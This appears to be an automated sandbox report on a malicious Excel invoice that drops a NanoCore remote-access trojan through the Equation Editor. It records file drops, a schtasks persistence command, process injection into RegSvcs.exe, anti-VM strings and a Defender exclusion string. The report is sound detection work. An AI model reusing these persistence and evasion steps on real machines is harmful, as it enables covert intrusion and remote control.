Source: 7.2.RegSvcs.exe.400000.0.unpack, u0023u003dqJT4I5hOweIku0024xYFEeDszbikglXCuquUdu0024v9AXtyq2nsu003d.cs	High entropy of concatenated method names: '#=qBeOBlH6CwHFnQdZWWBgZ_pemudZ6CfCVcfOQtgpeG$Y=', '#=q5v5cLSMFBaxiTtOEjscx86gN2ozXlfytiL6UmXnyWtg=', '#=q_XA5h2lVGHLcY9dK754wKGrOjAm6aBbwPxcUJXgJThJUz83kMbCL53G5uuOLP6Rq', '#=qIFfr$DrKqIieRc688$vylAlBsEnx9Z3$TxvrDsPURfM=', '#=qejgvNXJQvgM2GomZsygLjreyguSPQ29pQHqjR_a0dWk=', '#=qCGokdf0OOxeMJLDkXSfc3NPmwygIQ29RjKQWj$wbNGB9C1pPgma_891QiNyTRXcA', '#=qDqyUVyJLXCtYqhZ0$opqkomqhUBn2WCeEEvGAXlNQ$I=', '#=qdImPAY1o3YhbLtukwCQ91cISaeIEWRKSYrGZ3dTVnkY=', '#=qza7O1AHrroJC7yRIJz4wINR_Sgo4hDpQrj_OYfIrlJE=', '#=q6Ct3QmvVLFC7my$dL1uEiHGmXJ5qCuK4WIhDwfhPTFs='

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\Public\vbc.exe	Jump to dropped file
Source: C:\Users\Public\vbc.exe	File created: C:\Users\user\AppData\Roaming\gmSlQSien.exe	Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\nano[1].exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe	File created: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Jump to dropped file

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

File created: C:\Users\Public\vbc.exe

Jump to dropped file

Boot Survival:

Drops PE files to the user root directory

Show sources

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

File created: C:\Users\Public\vbc.exe

Jump to dropped file

Uses schtasks.exe or at.exe to add and modify task schedules

Show sources

Source: C:\Users\Public\vbc.exe

Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\gmSlQSien' /XML 'C:\Users\user\AppData\Local\Temp\tmp2720.tmp'

Hooking and other Techniques for Hiding and Protection:

Hides that the sample has been downloaded from the Internet (zone.identifier)

Show sources

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe

File opened: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe:Zone.Identifier read attributes | delete

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Source: SOL2021-03-14-NETC-NI-21-049-CEVA INV.xlsx

Stream path 'EncryptedPackage' entropy: 7.9998366813 (max. 8.0)

Malware Analysis System Evasion:

Yara detected AntiVM3

Show sources

Source: Yara match	File source: 00000004.00000002.2197072541.00000000026A1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: vbc.exe PID: 2480, type: MEMORY
Source: Yara match	File source: 4.2.vbc.exe.26b2ea0.3.raw.unpack, type: UNPACKEDPE

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Show sources

Source: vbc.exe, 00000004.00000002.2197072541.00000000026A1000.00000004.00000001.sdmp	Binary or memory string: WINE_GET_UNIX_FILE_NAME
Source: vbc.exe, 00000004.00000002.2197072541.00000000026A1000.00000004.00000001.sdmp	Binary or memory string: SBIEDLL.DLL

Source: C:\Users\Public\vbc.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Thread delayed: delay time: 922337203685477	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe

Window / User API: threadDelayed 546

Jump to behavior

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 2388	Thread sleep time: -300000s >= -30000s	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 2388	Thread sleep time: -60000s >= -30000s	Jump to behavior
Source: C:\Users\Public\vbc.exe TID: 2488	Thread sleep time: -104850s >= -30000s	Jump to behavior
Source: C:\Users\Public\vbc.exe TID: 2656	Thread sleep time: -60000s >= -30000s	Jump to behavior
Source: C:\Users\Public\vbc.exe TID: 2272	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe TID: 1100	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe	Last function: Thread delayed
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe	Last function: Thread delayed

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe

Code function: 7_2_004F0D66 GetSystemInfo,

7_2_004F0D66

Source: C:\Users\Public\vbc.exe	Thread delayed: delay time: 104850	Jump to behavior
Source: C:\Users\Public\vbc.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Thread delayed: delay time: 922337203685477	Jump to behavior

Source: vbc.exe, 00000004.00000002.2197072541.00000000026A1000.00000004.00000001.sdmp	Binary or memory string: vmware
Source: vbc.exe, 00000004.00000002.2197072541.00000000026A1000.00000004.00000001.sdmp	Binary or memory string: C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
Source: vbc.exe, 00000004.00000002.2197072541.00000000026A1000.00000004.00000001.sdmp	Binary or memory string: SOFTWARE\VMware, Inc.\VMware Tools
Source: vbc.exe, 00000004.00000002.2197072541.00000000026A1000.00000004.00000001.sdmp	Binary or memory string: VMware SVGA II!Add-MpPreference -ExclusionPath "
Source: vbc.exe, 00000004.00000002.2193832055.000000000056C000.00000004.00000020.sdmp	Binary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]
Source: vbc.exe, 00000004.00000002.2197072541.00000000026A1000.00000004.00000001.sdmp	Binary or memory string: VMWARE
Source: vbc.exe, 00000004.00000002.2197072541.00000000026A1000.00000004.00000001.sdmp	Binary or memory string: InstallPath%C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
Source: vbc.exe, 00000004.00000002.2197072541.00000000026A1000.00000004.00000001.sdmp	Binary or memory string: VMWARE"SOFTWARE\VMware, Inc.\VMware ToolsLHARDWARE\DEVICEMAP\Scsi\Scsi Port 1\Scsi Bus 0\Target Id 0\Logical Unit Id 0LHARDWARE\DEVICEMAP\Scsi\Scsi Port 2\Scsi Bus 0\Target Id 0\Logical Unit Id 0'SYSTEM\ControlSet001\Services\Disk\Enum
Source: vbc.exe, 00000004.00000002.2197072541.00000000026A1000.00000004.00000001.sdmp	Binary or memory string: VMware SVGA II
Source: vbc.exe, 00000004.00000002.2197072541.00000000026A1000.00000004.00000001.sdmp	Binary or memory string: vmwareNSYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000

Source: C:\Users\Public\vbc.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\Public\vbc.exe

Process token adjusted: Debug

Jump to behavior

Source: C:\Users\Public\vbc.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion:

Allocates memory in foreign processes

Show sources

Source: C:\Users\Public\vbc.exe

Memory allocated: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe base: 400000 protect: page execute and read and write

Jump to behavior

Injects a PE file into a foreign processes

Show sources

Source: C:\Users\Public\vbc.exe

Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe base: 400000 value starts with: 4D5A

Jump to behavior

Writes to foreign memory regions

Show sources

Source: C:\Users\Public\vbc.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe base: 400000	Jump to behavior
Source: C:\Users\Public\vbc.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe base: 402000	Jump to behavior
Source: C:\Users\Public\vbc.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe base: 420000	Jump to behavior
Source: C:\Users\Public\vbc.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe base: 422000	Jump to behavior
Source: C:\Users\Public\vbc.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe base: 7EFDE008	Jump to behavior

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\gmSlQSien' /XML 'C:\Users\user\AppData\Local\Temp\tmp2720.tmp'	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe	Jump to behavior

Source: RegSvcs.exe, 00000007.00000002.2394933863.0000000002814000.00000004.00000001.sdmp	Binary or memory string: Program ManagerH
Source: RegSvcs.exe, 00000007.00000002.2394140607.0000000000D30000.00000002.00000001.sdmp	Binary or memory string: Program Manager
Source: RegSvcs.exe, 00000007.00000002.2394140607.0000000000D30000.00000002.00000001.sdmp	Binary or memory string: Shell_TrayWnd
Source: RegSvcs.exe, 00000007.00000002.2394977223.000000000285A000.00000004.00000001.sdmp	Binary or memory string: Program Managera
Source: RegSvcs.exe, 00000007.00000002.2394140607.0000000000D30000.00000002.00000001.sdmp	Binary or memory string: !Progman
Source: RegSvcs.exe, 00000007.00000002.2393868574.00000000006A8000.00000004.00000020.sdmp	Binary or memory string: FoProgram Manager8
Source: RegSvcs.exe, 00000007.00000002.2393868574.00000000006A8000.00000004.00000020.sdmp	Binary or memory string: Program Manager- SOL2021-03-14-NETC-NI-21-049-CEVA INV - SOL2021-03-14-NETC-NI-21-049-CEVA INV:2
Source: RegSvcs.exe, 00000007.00000002.2394933863.0000000002814000.00000004.00000001.sdmp	Binary or memory string: Program Manager<

Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Queries volume information: C:\Windows\assembly\GAC_32\System.EnterpriseServices\2.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformation			Jump to behavior
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Queries volume information: C:\Windows\assembly\GAC_32\System.EnterpriseServices\2.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformation			Jump to behavior

Source: C:\Users\Public\vbc.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information:

Yara detected Nanocore RAT

Show sources

Source: Yara match	File source: 00000007.00000002.2394028902.0000000000840000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2197311253.00000000036A1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2395217863.00000000037E6000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2393666781.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: vbc.exe PID: 2480, type: MEMORY
Source: Yara match	File source: Process Memory Space: RegSvcs.exe PID: 2696, type: MEMORY
Source: Yara match	File source: 7.2.RegSvcs.exe.380d42c.9.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.vbc.exe.3890588.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.RegSvcs.exe.840000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.vbc.exe.3890588.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.RegSvcs.exe.38085f6.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.RegSvcs.exe.844629.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.RegSvcs.exe.3811a55.10.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.RegSvcs.exe.840000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.RegSvcs.exe.380d42c.9.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.vbc.exe.37494e8.4.raw.unpack, type: UNPACKEDPE

Remote Access Functionality:

Detected Nanocore Rat

Show sources

Source: vbc.exe, 00000004.00000002.2197311253.00000000036A1000.00000004.00000001.sdmp	String found in binary or memory: NanoCore.ClientPluginHost
Source: RegSvcs.exe, 00000007.00000002.2394028902.0000000000840000.00000004.00000001.sdmp	String found in binary or memory: NanoCore.ClientPluginHost
Source: RegSvcs.exe, 00000007.00000002.2393755361.00000000005C0000.00000004.00000001.sdmp	String found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationNanoCore.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1IClientNetworkNanoCore.ClientPluginIClientDataIClientAppIClientDataHostNanoCore.ClientPluginHostIClientNetworkHostIClientUIHostIClientLoggingHostIClientAppHostIClientNameObjectCollectionNanoCoreIClientReadOnlyNameObjectCollectionClientInvokeDelegateMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceReadPacketpipeNameparamsPipeCreatedPipeClosedConnectionStateChangedconnectedConnectionFailedhostportBuildingHostCacheVariableChangednameClientSettingChangedPluginUninstallingClientUninstallingget_Variablesget_ClientSettingsget_BuilderSettingsVariablesClientSettingsBuilderSettingsget_ConnectedClosePipePipeExistsRebuildHostCacheAddHostEntryDisconnectSendToServercompressConnectedInvokemethodstateLogClientMessagemessageExceptionLogClientExceptionexsiteRestartShutdownDisableProtectionRestoreProtectionUninstallEntryExistsSystem.Collections.GenericKeyValuePair`2GetEntriesGetValuedefaultValueSetValueval